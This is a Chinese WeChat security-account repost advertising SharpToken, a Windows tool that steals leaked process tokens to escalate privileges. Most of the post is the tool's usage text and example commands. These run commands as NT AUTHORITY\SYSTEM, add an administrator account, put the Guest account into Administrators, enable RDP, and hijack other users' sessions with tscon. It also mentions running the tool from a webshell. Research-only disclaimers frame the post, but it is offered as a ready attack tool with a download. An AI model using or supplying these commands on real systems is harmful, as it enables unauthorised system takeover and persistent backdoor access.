声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
工具介绍
SharpToken 是一种利用令牌泄漏的工具,它可以从系统中的所有进程中找到泄漏的令牌并使用它们,如果你是低权限服务用户,你甚至可以用它升级到“NT AUTHORITYSYSTEM”权限,无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。
工具用法
SharpToken By BeichenDream
=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITYNETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORITYSYSTEM
e.g.
SharpToken
execute
"NT AUTHORITYSYSTEM"
"cmd /c whoami"
bypass
Usage
:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid] [bypass]
list_all_token [process pid] [bypass]
add_user <username> <
password
> [
group
] [
domain
] [bypass]
enableUser <username> <NewPassword> [NewGroup] [bypass]
delete_user <username> [
domain
] [bypass]
execute
<tokenUser> <commandLine> [Interactive] [bypass]
enableRDP [bypass]
tscon <targetSessionId> [sourceSessionId] [bypass]
example:
SharpToken list_token
SharpToken list_token bypass
SharpToken list_token
6543
SharpToken add_user
admin
Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user
admin
SharpToken
execute
"NT AUTHORITYSYSTEM"
"cmd /c whoami"
SharpToken
execute
"NT AUTHORITYSYSTEM"
"cmd /c whoami"
bypass
SharpToken
execute
"NT AUTHORITYSYSTEM"
cmd
true
SharpToken
execute
"NT AUTHORITYSYSTEM"
cmd
true
bypass
SharpToken tscon
1
提升权限
除了通常的Token窃取权限增强,SharpToken还支持通过Bypass获取完整的Token。
ListToken
枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)
SharpToken
list_token
枚举来自指定进程的令牌
SharpToken
list_token
468
获取交互式shell
execute
"NT AUTHORITYSYSTEM"
cmd
true
获取命令执行结果(在webshell下执行)
SharpToken
execute
"NT AUTHORITYSYSTEM"
"cmd /c whoami"
下载地址
原文始发于微信公众号(Hack分享吧):提权神器!Windows令牌窃取专家
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论